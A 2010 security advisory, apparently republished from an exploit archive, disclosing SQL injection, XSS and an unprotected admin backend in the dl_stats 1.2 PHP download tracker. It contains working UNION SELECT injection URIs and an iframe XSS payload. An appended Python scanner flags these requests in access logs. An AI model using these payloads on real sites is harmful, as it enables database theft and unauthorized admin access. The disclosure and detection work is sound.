dl_stats 1.2 Multiple Vulnerabilities

2010-04-27 / 2010-04-28
Credit: Valentin
Risk: High
Local: No
Remote: Yes
CWE: CWE-79, CWE-89

# Exploit Title: dl_stats Multiple Vulnerabilities
# Date: 18.04.2010
# Author: Valentin
# Category: webapps/0day
# Version:
# Tested on:
# CVE :
# Code :

[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
|:: >> General Information
|:: Advisory/Exploit Title = dl_stats Multiple Vulnerabilities
|:: Author = Valentin Hoebel
|:: Contact = valentin@xenuser.org
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
|:: >> Product information
|:: Name = dl_stats
|:: Vendor = Claus van Beek
|:: Vendor Website = http://clausvb.de/
|:: Affected Version(s) = please view vulnerability details
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
|:: >> #1 Vulnerability
|:: Type = SQL Injection
|:: Affected Versions = < 2.0
|:: Vulnerable File(s) = multiple files
|:: Vulnerable Parameter(s) = multiple parameters
|:: #1 Example URI = view_file.php?id=6+AND+1=2+UNION+SELECT+1,concat(user()),concat(user()),concat(user()),concat(user()),6,7,concat(user())--
|:: #2 Example URI = download.php?id=2+AND+1=2+UNION+SELECT+1,concat(user()),3,concat(user()),concat(user())--
|::
|:: >> #2 "Vulnerability"
|:: Type = Unprotected Admin Backend
|:: Affected Versions = all
|:: URI = admin/index.htm
|:: This is not a real vulnerability. The admin backend simply isn't protected
|:: by any login; the installation manual recommends protecting it with a
|:: .htaccess file. Many webmasters just forget to do so.
|::
|:: >> #3 Vulnerability
|:: Type = XSS
|:: Affected Versions = < 2.0
|:: Vulnerable File(s) = multiple files
|:: Vulnerable Parameter(s) = multiple parameters
|:: Example URI = download_proc.php?id=<iframe src=http://www.google.de>
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
|:: >> Additional Information
|:: Advisory/Exploit Published = 18.04.2010
|:: The vendor seems to have rewritten the dl_stats software. Since version 2.0
|:: it validates the user input. The vendor only offers the latest version for download.
|:: If you want to test around a little bit, you may be lucky and find an old
|:: version to download somewhere.
|:: Although version 2.0 was released a long time ago, many websites still use the
|:: old versions.
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
|:: >> Misc
|:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
|::
|::
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]
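As an added defender-side example (not part of the advisory and not dl_stats code), a small Python scanner that applies the advisory's facts to Apache-style access logs: the three scripts it names take an integer `id`, so any non-numeric `id` (the UNION and iframe example URIs above decode to such values) is flagged, and requests to the unprotected admin/index.htm from an address outside an allow-list are reported. The log lines, addresses and allow-list are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts the advisory names; each takes an "id" that should be a plain
# integer, so the UNION/iframe payloads show up as non-numeric values.
ID_SCRIPTS = {"view_file.php", "download.php", "download_proc.php"}
ADMIN_PREFIX = "/admin/"  # unprotected backend described in the advisory

# Apache/nginx combined-log request line (only the fields we need).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

def check_request(ip, uri, admin_allow=frozenset()):
    """Return a list of findings for a single request."""
    findings = []
    parts = urlsplit(uri)
    script = parts.path.rsplit("/", 1)[-1]
    if script in ID_SCRIPTS:
        # parse_qs percent-decodes and turns '+' into spaces, so the
        # value is inspected in the form the application would see.
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            if not value.isdigit():
                findings.append(f"non-numeric id on {script}: {value!r}")
    if parts.path.startswith(ADMIN_PREFIX) and ip not in admin_allow:
        findings.append(f"admin backend request from unlisted address {ip}")
    return findings

def scan_log(lines, admin_allow=frozenset()):
    """Scan log lines; return (ip, uri, finding) tuples in log order."""
    results = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a request line in the expected format
        for finding in check_request(m["ip"], m["uri"], admin_allow):
            results.append((m["ip"], m["uri"], finding))
    return results

# Constructed sample log (not real traffic); the two payload URIs are the
# advisory's example URIs, percent-encoded as a browser would send them.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Apr/2010:10:00:01 +0200] "GET /view_file.php?id=6 HTTP/1.1" 200 512',
    '203.0.113.5 - - [18/Apr/2010:10:00:02 +0200] "GET /view_file.php?id=6+AND+1=2+UNION+SELECT+1,concat(user()),concat(user()),concat(user()),concat(user()),6,7,concat(user())-- HTTP/1.1" 200 640',
    '198.51.100.7 - - [18/Apr/2010:10:00:03 +0200] "GET /download_proc.php?id=%3Ciframe%20src=http://www.google.de%3E HTTP/1.1" 200 300',
    '198.51.100.7 - - [18/Apr/2010:10:00:04 +0200] "GET /admin/index.htm HTTP/1.1" 200 1200',
    '192.0.2.10 - - [18/Apr/2010:10:00:05 +0200] "GET /admin/index.htm HTTP/1.1" 200 1200',
]
ADMIN_ALLOW = frozenset({"192.0.2.10"})  # constructed: the site owner's address

if __name__ == "__main__":
    for ip, uri, finding in scan_log(SAMPLE_LOG, ADMIN_ALLOW):
        print(f"{ip} {uri[:40]} -> {finding}")
```

The integer check on `id` is the same validation the application itself should perform before using the parameter in a query or echoing it into a page.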

References:

http://xforce.iss.net/xforce/xfdb/57917
http://www.xenuser.org/documents/security/dl_stats_multiple_vulnerabilities.txt
http://www.xenuser.org/2010/04/18/dl_stats-multiple-vulnerabilities-sqli-xss-unprotected-admin-panel/
http://www.vupen.com/english/advisories/2010/0939
http://www.securityfocus.com/bid/39592
http://www.osvdb.org/63908
http://www.osvdb.org/63907
http://www.exploit-db.com/exploits/12280
http://secunia.com/advisories/39496
http://packetstormsecurity.org/1004-exploits/dlstats-sqlxssadmin.txt



Copyright 2024, cxsecurity.com